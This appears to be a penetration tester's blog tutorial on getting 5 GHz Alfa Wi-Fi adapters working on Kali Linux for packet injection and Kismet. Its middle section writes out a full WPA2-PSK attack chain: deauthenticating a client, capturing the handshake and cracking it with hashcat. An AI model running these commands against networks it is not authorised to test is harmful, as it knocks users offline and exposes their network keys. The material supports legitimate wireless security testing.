How to get your new 5 GHz wireless penetration gear up and working

What new wireless .ac cards work with the latest rolling Kali release (4.14)?

As of February 6th, you can download or upgrade to the latest rolling release of Kali Linux 2018.1. Here’s a quick run down of what to do to ensure your gear is working for your next wireless penetration test. No wireless cards only a few routers can be used packet injection.

The Realtek Chipset based wireless USB cards are now commonplace, like the evil looking Alfa AC1200 & AC1900 WiFi adapters which are currently sold on Amazon. They support 5 GHz as well, but dependent on versions and the Realtek chip set aren't consistent at this time due to driver issues. Cards like like the Ralink MediaTek RT3572 Chipset based cards work out the box and have solid driver support, but have their issues as well.

AWUS052NH

Performs passive and offensives discovery and attack modes for both 2.4 and 5 GHz bands.
Works out the box for Kali 4.14 and supports injection.
root@kali:~# lsusb
Bus 001 Device 002: ID 148f:3572 Ralink Technology, Corp. RT3572 Wireless Adapter
# airmon-ng start wlan0
#history
1 apt-get update && apt-get upgrade
2 apt-get dist-upgrade

root@kali:~#uname -ar
Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.12-2kali1 (2018-01-08) x86_64 GNU/Linux

— After a reboot —

Out of 3 cards tested so far with the latest Kali rolling release the only one that work out the box is the AWUS052NH in the 5GHz world. Any other card you’re dealing with an unstable and not finalized driver. Your mileage will vary depending on your version of Kali. If you like rolling updates, then buyer beware.

Install Wireless Drivers with Kali rolling

AWUS036ACH & AWUS1900

$  apt install realtek-rtl88xxau-dkms

Setting monitor mode manually

You have to set the monitor mode manually on the AWUS036ACH & AWUS1900 cards at this time.

Set interface down
$ sudo ip link set wlan0 down
Set monitor mode
$ sudo iwconfig wlan0 mode monitor
Set interface up
$sudo ip link set wlan0 up

for switching channels (interface must be up)

Set channel 6, width 40 MHz:
$ sudo iw wlan0 set channel 6 HT40-
Set channel 149, width 80 MHz:
$ sudo iw wlan0 set freq 5745 80 5775

for setting TX power (doesn’t work on every card)

$ sudo iwconfig wlan0 txpower 30
or
$ sudo iw wlan0 set txpower fixed 3000

Troubleshooting

If you run into Linux header issues when install your new wireless drives it may be due to the latest rolling release . My suggestion, look through your Linux images and install the requirements

apt-cache search linux-image

Ensure you installed the requirements and/or manually install the drivers.

apt install dkms &&
apt-get install bc &&
apt-get install build-essential &&
apt-get install linux-headers-$(uname -r)
git clone https://github.com/aircrack-ng/rtl8812au

Test

Ensure your card is now working in monitor mode. I like to make sure the card is working with the aircrack-ng suite installed by default before I install the latest kismet. I usually do this for passive recon before I start testing offensively.

airodump-ng wlan1 --band ag -M -U --wps --beacons -w captureallthewireless
#ifconfig wlan0
#aireplay-ng wlan0 -9
10:09:24 Trying broadcast probe requests..

Install the latest Kismet


Installation instructions taken from kismet’s git page.
sudo apt-get install build-essential git libmicrohttpd-dev \            zlib1g-dev libnl-3-dev libnl-genl-3-dev libcap-dev \ libpcap-dev libncurses5-dev libnm-dev libdw-dev \
libsqlite3-dev

Clone Kismet from git. If you haven't cloned Kismet before:

$ git clone https://www.kismetwireless.net/git/kismet.git
$ cd kismet
$ git pull
$ cd kismet
$ ./configure
Compile Kismet.  

$ make

Kismet

./kismet wlan0
Point your browser at http://localhost:2501

This is my own Kali box above, shown working with a card in monitor mode and the web interface accessible locally. I really like the new UI web interface. It’s great for interacting with your data, and with cool tools like the KismetMobileDashboard and the upcoming support for more software defined radios like the HackRF coming; Kismet has some awesome ways to interact with tons of useful AP and client info for WiFi and Bluetooth.

elkentaro/KismetMobileDashboard

Cool, so we should have a VM running Kali 4.14 with .ac support, and injection support for Part 2. This should give us a nice new working Kali install that’s a reproducible environment to test some newer attacks.

Next time we’we’ll look at offensive wireless attacks that I’ve used on clients while performing wireless penetration testing for companies. Wireless attacks that I’ll describe have been used to breach some of the largest companies , from Fortune 5’s to small and medium businesses alike.


802.11ac Wireless Attacks

Part 2:

  1. Configuration of your device for injection attacks that can be used with .ac wireless access points
  2. How to perform deauth attacks on 5 GHz channels
  3. How to capture a 4 way handshake, for a wireless network using WPA2-PSK that’s broadcasting on a 5 GHz channel
  4. How to convert the handshake to the right format, so we can brute force it with hashcat.

We’ll also discuss in part 3 in detail about advanced wireless offensive attacks that not only lure clients to connect, but perform man-in-the-middle attacks and/or network attacks against the unsuspecting victims. Part 3 will take a deep dive into common offensive wireless attacks.

AWUS036ACH after setting the channel:

iwconfig wlan1 channel 149

Lets test the interface using native tools to rule out any channel, driver or aircrack-ng specific nuances with this version the Realtek 5 GHz compatible USB device, and the latest release of Kali.

Remember we have lots of variables in the mix, so your mileage may vary depending on Operating System type and driver.

root@kali:~# aireplay-ng |more
Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
https://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid  : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection

Lets test injection:

root@kali:~# aireplay-ng -D --test -e ssid -a P4:E4:E4:92:60:71 wlan1
10:53:10 Trying broadcast probe requests...
10:53:12 No Answer...
10:53:12 Found 1 AP
10:53:12  Trying directed probe requests...
10:53:12 C4:E9:84:9F:60:71 - channel: 0 - 'shameless-karma!'
10:53:18 0/30: 0%
root@kali:~# iwconfig wlan1 channel 149

It performs injection perfectly AFTER hard coding the channel we’re sniffing

kali:~# aireplay-ng -D --test -e ssid -a P4:E4:E4:92:60:71 wlan1
10:53:27 Trying broadcast probe requests...
10:53:29 No Answer...
10:53:29 Found 1 AP
10:53:29  Trying directed probe requests...
10:53:29 P4:E4:E4:92:60:71 - channel: 0 - 'shameless-karma!'
10:53:29 Ping (min/avg/max): 0.914ms/2.795ms/5.201ms Power: -37.61
10:53:29 28/30: 93%
10:53:29  Injection is working!

Let’s try the Fake authentication de-authentication method on 5 GHz:

aireplay-ng -D --fakeauth 6000 -o 1 -q 10 -a 20:AA:XX:XX:XX:XX \
-h E0:F8:XX:XX:XX:XX -e MYISPSUCKS-5G wlan0mon

Where:

  • -6000 — Re-authenticate very 6000 seconds. The long period also causes keep alive packets to be sent.
  • -o 1 — Send only one set of packets at a time. Default is multiple and this confuses some APs.
  • -q 10 — Send keep alive packets every 10 seconds.
  • -h E0:F8:XX:XX:XX:XXis our card MAC address
  • -e MYISPSUCKS-5G is the wireless network name

Let’s tie it all together, send some deuath packets to a client; and grab a 5 GHz 4 way handshake from an access point using WPA2-PSK.

# put your network device into monitor mode
Set interface down
$ sudo ip link set wlan0 down
Set monitor mode
# iwconfig wlan0 mode monitor
Set interface up
# ip link set wlan0 up
# listen for all nearby beacon frames to get target BSSID and 
# airodump-ng wlan0 --band abg
Set 5 GHz channel
# iwconfig wlan0 channel 149
Start listening for the handshake
# airodump-ng -c 149 --bssid P4:E4:E4:92:60:71 -w cap01.cap wlan0
Optionally deauth a connected client to force a handshake
# aireplay-ng -D -0 2 -a 9C:5C:8E:C9:AB:C0 -c P4:E4:E4:92:60:71 wlan0
Convert cap to hccapx
# root@kali:~# aircrack-ng -J file.cap capture.hccap
Crack with hashcat:
>hashcat.exe -m 2500 capture.hccapx rockyou.txt

For any issues when converting .cap captures try, wpaclean or

git clone https://github.com/wpatoolkit/Cap-Converter

5 GHz Injection Tests

The cards tested below support injection, with little to no manual driver configuration with the latest Kali rolling

This is meant to supplement the aircrack-db test database for the newer Alfa cards,I’ve had a chance to test for injection in the 802.11.ac spectrum.
apt install realtek-rtl88xxau-dkms

Working cards

  • Alfa AC1200
  • Alfa AWUS052NH
  • Alfa AWUS036NH
  • Alfa AWUS036ACH
1 set of Contenders:

Score 100%

  • Alfa AC1200
  • Alfa AWUS1900
root@kali:~# airmon-ng
PHY Interface Driver  Chipset
phy0 wlan0  8814au  Realtek Semiconductor Corp. 
phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572
phy3 wlan2 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy5 wlan3 8812au Realtek Semiconductor Corp. RTL8812AU
802.11a/b/g/n/ac WLAN Adapter
phy4 wlan4 rt2800usb Ralink Technology, Corp. RT2770
root@kali:~# iwconfig wlan2 channel 149
root@kali:~# iwconfig wlan3 channel 56
root@kali:~# aireplay-ng -D -9 -i wlan2 wlan3
14:55:33  Trying broadcast probe requests...
14:55:34 No Answer...
14:55:34 Found 1 AP
14:55:34  Trying directed probe requests...
14:55:34 P4:29:88:9F:60:71 - channel: 149 - 'ssid'
14:55:35 Ping (min/avg/max): 0.735ms/3.759ms/9.462ms Power: -37.77
14:55:35 30/30: 100%
14:55:35  Injection is working!
14:55:35  Trying card-to-card injection...
14:55:35 Attack -0: OK
14:55:35 Attack -1 (open): OK
14:55:35 Attack -1 (psk): OK
14:55:35 Attack -2/-3/-4/-6: OK
14:55:35 Attack -5/-7: OK
root@kali:~# iwconfig

wlan2 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off


lo no wireless extensions.
wlan1     IEEE 802.11  Mode:Monitor  Frequency:5.745 GHz  Tx-Power=30 dBm   
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off

wlan4 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off

wlan0 IEEE 802.11 Mode:Monitor Frequency:2.452 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

wlan3 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off


eth0 no wireless extensions.
2nd set of Contenders

Score 90%

  • Alfa AWUS052NH
  • Alfa AWUS036NH
root@kali:~# iwconfig wlan1 channel 36
root@kali:~# iwconfig wlan4 channel 149
root@kali:~# aireplay-ng -D -9 -i wlan1 wlan4
root@kali:~# iwconfig wlan4 channel 149
root@kali:~# aireplay-ng -D -9 -i wlan1 wlan4
15:10:11  Trying broadcast probe requests...
15:10:13 No Answer...
15:10:13 Found 1 AP
15:10:13  Trying directed probe requests...
15:10:13 BF:E9:54:9F:T0:71 - channel: 149 - 'shameonyou'
15:10:13 Ping (min/avg/max): 0.330ms/6.444ms/12.453ms Power: -26.00
15:10:13 30/30: 100%
15:10:13  Injection is working!
15:10:13  Trying card-to-card injection...
15:10:13 Attack -0: OK
15:10:13 Attack -1 (open): OK
15:10:13 Attack -1 (psk): OK
15:10:13 Attack -2/-3/-4/-6: OK
15:10:17 Attack -5/-7: Failed

root@kali:~# iwconfig
wlan2 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

lo no wireless extensions.
wlan1     IEEE 802.11  Mode:Monitor  Frequency:5.745 GHz  Tx-Power=30 dBm   
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off


wlan4 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off


wlan0 IEEE 802.11 Mode:Monitor Frequency:2.452 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

wlan3 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

eth0 no wireless extensions.
root@kali:~# airmon-ng
PHY Interface Driver  Chipset
phy0 wlan0  8814au  Realtek Semiconductor Corp. 
phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572
phy3 wlan2 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy5 wlan3 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy4 wlan4 rt2800usb Ralink Technology, Corp. RT2770

3rd set of Contenders

Score 50%

  • Alfa AWUS036ACH — 100%
  • Alfa AWUS1900–50 %
root@kali:~# aireplay-ng -D -9 wlan0 wlan1
"aireplay-ng --help" for help.
root@kali:~# aireplay-ng -D -9 wlan1
15:20:11 Trying broadcast probe requests...
15:20:13 No Answer...
15:20:13 Found 0 APs
root@kali:~# iwconfig wlan1 channel 149
root@kali:~# aireplay-ng -D -9 wlan1
15:20:21 Trying broadcast probe requests...
15:20:21 Injection is working!
15:20:23 Found 1 AP
15:20:23  Trying directed probe requests...
15:20:23 V4:E9:F4:9F:Z0:71 - channel: 149 - 'yourssidrules'
15:20:23 Ping (min/avg/max): 0.901ms/10.325ms/14.429ms Power: -26.00
15:20:23 30/30: 100%
root@kali:~# aireplay-ng -D -9 wlan0
15:20:47 Trying broadcast probe requests...
15:20:49 No Answer...
15:20:49 Found 0 APs
root@kali:~# airmon-ng
PHY Interface Driver  Chipset
phy6 wlan0  8814au  Realtek Semiconductor Corp. - partially working
phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572 - woring